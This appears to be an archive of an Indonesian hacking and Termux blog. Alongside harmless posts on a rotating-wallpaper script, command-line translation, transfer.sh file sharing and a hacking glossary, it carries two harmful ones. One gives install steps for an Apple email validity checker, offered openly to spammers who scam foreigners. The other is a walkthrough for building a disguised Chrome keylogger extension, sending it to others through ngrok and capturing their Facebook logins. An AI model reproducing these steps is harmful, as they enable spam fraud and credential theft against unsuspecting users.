Sunday, February 17, 2019

Email apple valid checker

Yo kali ini w bakal ngasih tools yang amat cukup berguna buat kalian yang hobi porotin bule-bule wkwkw:v terutama buat kalian yang kang spam, yah karena kali ini saya akan memberikan tools validasi email apple, yang saya denger-denger kalau list dari email apple itu cukup berbobot harganya dibanding empas email lain.Dan tools email valid apple biasanya sih kalian harus berbuy ea:v tapi disini saya akan memberikan tools gratisnya buat cek validnya dan tools ini open source ea bujank.Gausah recode ye:)

Berikut cara installnya di termux, ga harus di termux di CMD kalau udh install python2 juga bisa gan, tapi kita fokus ke termux aja yah gan:*
$ apt-get install git -y
$ apt-get install python2 -y
$ git clone https://github.com/zevtyardt/valid-apple
$ cd valid-apple
$ python2 apple.py
Lalu masukkan list yang berisikan empas-empas kalian yah terus isi threadnya terserah tapi saya disini memasukan 10 threadnya.
Nah udah deh gampang kan hehe, okeh mungkin disini aja kali yah dan jika saat menjalankan file ada peringatan no module blablbala itu artinya ada module yang belum kalian install gan, caranya kalian tinggal aja install misalnya no module named request nah cara fixnya cukup ketik perintah pip install request, kalau no module named mechanize tinggal ganti yang requests jadi mechanize.Okeh semoga faham, jika kurang faham bisa komen

Spesial thanks to : Doinya lexie casanova hehe:v

Membuat wallpaper bergerak dengan termux

Hae visitor yang budiman:* kali ini kita membahas tentang wallpaper smartphone kalian, dan dengan bantuan termux kita bisa membuat wallpaper bergerak atau berganti-ganti sih lebih tepatnya. Dari gambar 1 ke gambar berikutnya, tapi sebelum kalian menggunakan cara ini kalian harus sudah menginstall termux API jika belum kalian bisa baca di postingan kami yang sebelumnya mengenai termux API.


Sudah kalian baca ? saya anggap sudah:v dan berikut script untuk membuat wallpaper berganti-ganti dari gambar satu ke gambar lainya
#!/bin/bash

while [ true ]
do
   for i in $(ls /path/path/*)
   do
      termux-wallpaper -f ${i}
   done
done
Untuk /path/path itu kalain ubah menjadi letak dari folder yang menyimpan gambar-gambar yang mau kalian jadikan sebuah wallpaper, misalnya saya menaruh gambar di sebuah folder javaghost yang saya letakan di memori internal saya, maka saya merubah path tersebut menjadi /sdcard/javaghost.
Seperti ini jadinya
Lalu save dengan extensi .sh misalnya run.sh test.sh contoh.sh kemudian jika sudah sekarang kita jalankan dengan perintah
$ bash run.sh
Jika berhasil maka akan muncul text "Wallpaper set successfully!" seperti dibawah
Okeh semoga dikalian tidak ada kendala, sekarang kalian lihat hasilnya maka wallpaper kalian akan berganti-ganti hehe:v oh iyah kalian juga bisa mengatur delay dengan menambahkan sleep di bawah termux-wallpapernya, seperti gambar di bawah ini.
sleep 5s artinya tidur selama 5 detik s adalah singkatan dari second atau detik, jadi gambar akan berubah selama 5 detik sekali, bisa juga d untuk day atau hari:"v kemudian ada lagi m dan h atau minute dan hours yang artinya perjam dan permenit contoh
sleep 1s   : 1 second/detik
sleep 1m  : 1 minute/menit
sleep 1h   : 1 hours/jam
sleep 1d   : 1 day/hari

Okeh mungkin hanya segitu saja yang bisa saya jelaskan, jika kalian mengalami kesusahan bisa coment atau hubungi di contact adm0n:"v saya tau ini emang gaguna banget dan tentunya ini sangat menguras batrei kalian masing-masing, jadi ingat jangan sering-sering menggunakan cara ini, just for fun baby:v

Tararengkyu-

Tuesday, February 5, 2019

Menggunakan google translate di linux dan termux

Asallamuallaikum wr.wb
google translate 90% dari kalian sudah tau bukan, yaps kali ini kita akan menggunakan google translate dari command line atau google translate CLI version, saya disini menggunakan linux dan termux okeh untuk di linux kita cukup mengetikan perintah
$ sudo apt-get install translate-shell -y
Lalu untuk menjalankanya ketik perintah
$ trans --help
biar tau perintah-perintahnya:* contoh aja nih saya mau translate kata saya dari indonesia ke inggris maka perintahnya seperti ini
$ trans id:en saya
id : kode negara indonesia
en : kode negara english

Untuk melihat semua kode negara perintahnya
$ trans -R
Dan untuk penggunaanya ditermux caranya seperti ini
$ wget git.io/trans
$ chmod +x trans
$ mv -v trans $PREFIX/bin
Menjalankanya sama kita cukup ketik perintah
$ trans --help
Jika tadi kita merubah kata saya dan itu cuma satu kata doang, lalu untuk mentranslate lebih dari satu kata atau 1 kalimat caranya dengan menggunakan tanda (") petik dua, jika kalian mencoba translate dari indonesia ke inggris dengan lebih dari satu kata misalnya saya buriq tanpa tanda petik dua maka hasilnya akan mendapatkan 2 artian saya sendiri buriq sendiri, gapercaya ? coba aja:* dan berikut cara untuk translate lebih dari 1 kata
$ trans id:en "saya adalah saya"
Okeh sampai disini dulu, jika kalian pengguna termux dan saat menggunakan cara di atas mengalami gangguan atau error kalian bisa coment atau contact saya:*

Wasallamuallaikum wr.wb

Chrome keylogger extension

Asallamuallaikum wr.wb
dah lama ea ga ngepost'( dan akhirnya ngepost ugha:v okeh sebelum ke pembahasan kita dongeng dulu tentang judulnya.Yaps keylogger dan extension apa itu keylogger ? keylogger adalah sebuah tool atau alat yang digunakan untuk merekam atau memantau setiap ketikan dari keyboard, jadi ini juga termasuk malware atau virus yang memang tidak bahaya bagi kesehatan pc/handphone anda jika terkena malware ini, karena malware ini hanya merekam setiap ketikan yang anda ketik melalui keyboard.Memang tidak berbahaya bagi kesehatan pc/handphone kalian tapi bahayanya berdampak pada privasi kalian, karena seperti yang saya bilang keylogger itu merekam setiap ketikan yang anda ketik maka secara tidak langsung jika kalian terkena malware ini sama halnya jika kalian login sosmed lalau kalian memasukan username dan password kalian secara tidak langsung kalian juga sudah memberi username dan password kalian ke hacker tersebut, alhasil akun kalian terbajak.Dan cara membuat keylogger pun banyak tools" dan software yang khusus untuk membuat keylogger juga sudah banyak, nah salah satunya saya akan mengenalkan tools bernama HeraKeylogger tools ini membuat keylogger dengan kedok sebuah extension dari google chrome, ada yang belum tau extension ? cari google:v kalau saya jelasin ntar ga selesai-selesai gan:v contohnya aja seperti inilah yang namanya extension
Terus fungsinya apa min kalau kita install extension-extension tersebut ? emm itu sih tergantung dari extension tersebut, misalnya Dark Reader saya menginstall extension ini karena extension ini bisa membuat tampilan web yang terang banget kek cahaya ilahi:"v jadi gelap kek kehidupan saia:') yah intinya ini extension buat mode malam dan siang gitu deh.Okeh lanjut ke toolnya, dan saya menjalankanya di windows yang sudah di aktifkan WSL atau Windows Subsytem for Linux agar kita bisa menggunakan terminalnya linux di windows 10.

Paket yang di butuhkan
  • Python 3.x
  • PHP
  • git
Module yang dibutuhkan
  • huepy
Ntap ea nama modulenya:'v lanjut ke penginstallanya
$ sudo apt-get install python3 -y
$ sudo apt-get install python3-pip -y
$ sudo apt-get install git -y>
$ sudo apt-get install php -y
Kemudian kita clone toolsnya dari reponya
$ git clone https://github.com/UndeadSec/HeraKeylogger
$ cd HeraKeylogger
$ pip3 install -r requirements.txt
Lalu jalankan deh dengan perintah
$ python3 hera.py
Munculah text bertanya seperti ini

"[!] Do you agree to use this tool for educational purposes only? (y/N) >"

Kalian Y aja, terus muncul tampilan seperti ini
Insert your sever blablablab : itu bisa kalian ganti, karena saya menggunakan cara ini dengan laptop saya sendiri, jadi saya menggunakan 127.0.0.1 itu artinya localhost / itu hanya bekerja pada laptop saya sendiri tapi jika kalian ingin mengirim keylogger ini ke orang lain, kalian bisa menggunakan ngrok/serveo untuk forwardingnya.
Edit manifest blbalba : Y untuk mengeditnya, apa yang di edit atau di ganti ? tentu saja nama dan deskripsi extensionya nanti.
insert new name : masukin nama sesuka kalian, itu untuk memberi sebuah nama extensionya 
insert description : untuk merubah deskripsi extension yang kalian buat
insert a new version number : untuk memberi versi extesion yang kalian buat
start php local server : kalian klik Y saja

Nah jika sudah coba kita cek apakah extensinya sudah bisa dimuat di chrome saya, pertama masuk chrome kalian masing-masing klik tombol 3 di pojok kanan pilih setelan, kemudian di bagian kiri ada 3 garis kalian klik lalu lihat di bawah ada text bertuliskan ekstensi atau extension kalian klik itu, lalau untuk supaya bisa memasukkan extension yang sudah kita buat tadi kalian aktifkan mode pngembang yang ada di pojok kanan, jika sudah kalian aktifkan lalu pilih yang muat yang belum dibuka tergantung bahasa juga sih:v
Jika sudah kalian klik muat yang belum dibuka, masukin deh extension yang kita buat tadi, tergantung kalian menyimpanya dimana yah.Saya di desktop
Nah itu mailiciblbalbala itulah pokoknya:v kita klik lalu otomatis akan masuk kedalam extension chrome tersebut, seperti ini jika sudah masuk
Nah samakan nama dan deskripsi yang kita buat tadi ? terus cara kerjanya gimana ? ini sudah bekerja kan atau sudah berjalan:v saya coba buka facebook dan blog saya ini javaghost dan kita cek
And look baby:"v dia merekam apa yang saya buka, sekarang coba saya login facebook dan memasukkan username dan password saya apakah tools ini akan mendapatkan username dan password saya ? kita cek lagi.
Boom! work:v dia mengambil email dan password saya yang sudah saya ketik di browser saya.Nah gimana tertarik dengan tools ini ? silahkan kalian install dan jika suka bisa share blog ini:* jika kurang apa dan kenapa kalian bisa coment dibawah_<
Note : keylogger ini hanya bekerja pada browser chrome.

Wasallamuallaikum wr.wb

Wednesday, January 23, 2019

Berbagi file menggunakan termux

source : https://www.nucleustechnologies.com
Asallamuallaikum wr.wb
berbagi file atau sharing file dari si A ke si B mungkin sudah banyak yah cara-caranya, dan situs-situs untuk menyimpan file-file untuk berbagi satu sama lain pun banyak seperti Dropbox, Google Drive, MediaFire.Tapi kalian bisa loh berbagi files menggunakan baris perintah atau command line seperti termux, linux, ubuntu bahkan dengan menggunakan CMD di windows.Caranya cukup mudah singkat dan padat:v okeh langsung saja ke tutorialnya.

Langkah pertama yang kita lakukan untuk menggunakan cara ini adalah kita install curl dulu di termux atau linux.Perintahnya untuk mengginstal curl di termux
$ pkg install curl -y
Lalu kita curl transfer.sh (Ehm) gausah bingung knp tiba" ada transfer.sh :v itu bukan file yah gan, itu adalah situs file transfer yang bisa kita gunakan melalui baris perintah atau command line.
Okeh bagimana cara uploadnya ke file sharing ini ? langsung aja yang pertama kalian siapin aja dulu filenya yg ingin di upload ntah itu mp4, mp3, jpg, apk, tar, zip terserah karena ini support semua file dan maksimal sizenya 10gb untuk fitur lainya kalian explore sendiri ea bujank:"v untuk cara penggunaanya kalian bisa lihat video dibawah.

Sebarnya dengan curl -T juga bisa jadi seperti ini
$ curl -T namafile https://transfer.sh/namafile
Terus letak file kalian nanti muncul otomatis seperti yang di video yaitu dengan nama https://transfer.sh/blablabla/namafile untuk downloadnya ? kita bisa gunakan curl, wget atau langsung ke webnya juga bisa saya contohnya dengan curl
$ curl https://transfer.sh/blalba/namafile -o terserah
Dimana perintah -o adalah output, kalian bisa menggubah namanya misalnya nama file kalian yang kalian upload bernama tayo.txt lalu dengan perintah -o dari curl kita bisa ubah menjadi wakanda.txt seperti itu.

Okeh untuk mengetahui berapa lama file bisa tersimpan di transfer.sh dan perintah-perintah apa saja yang bisa digunakan, kalian bisa explore sendiri yah gan di situs resminya yaitu transfer.sh jika ada yang kurang jelas/kurang apa gitu:"v kalian bisa comentar dibawah:* Oh seperti yang salah bilang diatas kita bisa menggunakan cara ini di CMD windows bagaimana caranya ? yang pasti windows kalian sudah terinstall curl yah gan, atau kalian bisa mengaktifkan curl dari php.


Baca juga : Cara install PHP di windows

Wasallamuallaikum wr.wb

Tuesday, January 22, 2019

Arti kata-kata dalam hacking ?

Asallamuallaikum wr.wb
hallu:v sorry gan jarang update atau jarang post buat artikel:( hehe dan hari ini saya akan membahas dunia hacking lagi lebih tepatnya saya akan mebagikan arti kata-kata yang mungkin kalian sering dengar dari dunia hacking tapi tidak tau apa yang di maksud orang itu:v nah alangkah baiknya jika kita tau artian tersebut juga.

1). Backdoor
Backdoor pasti kalian sering dengar kata-kata ini jika kalian bergabung dengan forum-forum yang membahas tentang IT lalu apa itu backdoor ? backdoor atau pintu belakang, jika dalam dunia hacking atau keamanan sebuah sistem adalah sebuah alat yang digunakan untuk para hacker atau peretas untuk mengontrol sistem administrator dari sebuah website maupun mengontrol sebuah komputer dan smartphone sekaligus dengan secara anonim atau tanpa diketahui pengguna tersebut.
Dan ada banyak tools untuk membuat backdoor ini salah satunya tools yang cukup terkenal dikalangan para haxor:'v adalah Metasploit yaps dengan metasploit kita bisa membuat backdoor untuk web, komputer, dan smartphone.

Baca juga : Cara install metasplot di termux

2). Social Engineering
Atau lebih sering dikenal dengan istilah soceng :v ini adalah sebuah teknik untuk memanipulasi pikiran seseorang agar orang itu mau menuruti kemauan kita atau percaya dengan omongan kita.
Jadi buat kalian jangan mudah percaya dengan kata-kata manis yang sering muncul di sosial media seperti cara mendapatkan pulsa gratis ini gratis itu gratis, hmmm all that is just bullshit! :)

3). Spoofing
Spoofing berasal dari kata spoof yang berarti meniru dari program asli.
Ada banyak jenis spoofing dan yang paling populer adalah spoof IP, spoof MAC, spoof email.Dan teknik ini cukup populer dan mungkin masih sering digunakan oleh para hacker diluar sana dengan tujuan mendapatkan sebuah data dari orang-orang tertentu, teknik ini sering dilakukan di area yang ramai banyak orang karena itu sangat menguntungkan bagi si attacker.Adapun cara mencegahnya itu tergantung dari teknik si hacker gunakan yah, karena setiap teknik beda-beda pencegahanya.Software maupun tools untuk spoofing pun cukup banyak ada wireshark, bettercap, ettercap, tcp dump dan masih banyak lagi.

Sebenarnya masih banyak yah artian lainya seperti DDoS, Botnet, Binary dan banyak lagi.Tapi jika saya berikan informasinya satu-satu itu pasti banyak banget:v maka segitu aja yah hehe.Okeh jika kurang lengkap kalian bisa cek link dibawah untuk informasi lainya tentang arti kata-kata yang sering muncul di dunia hacking.

Ingin cari tau tentang arti lainya ? cek : http://haktuts.com

Wasallamuallaikum wr.wb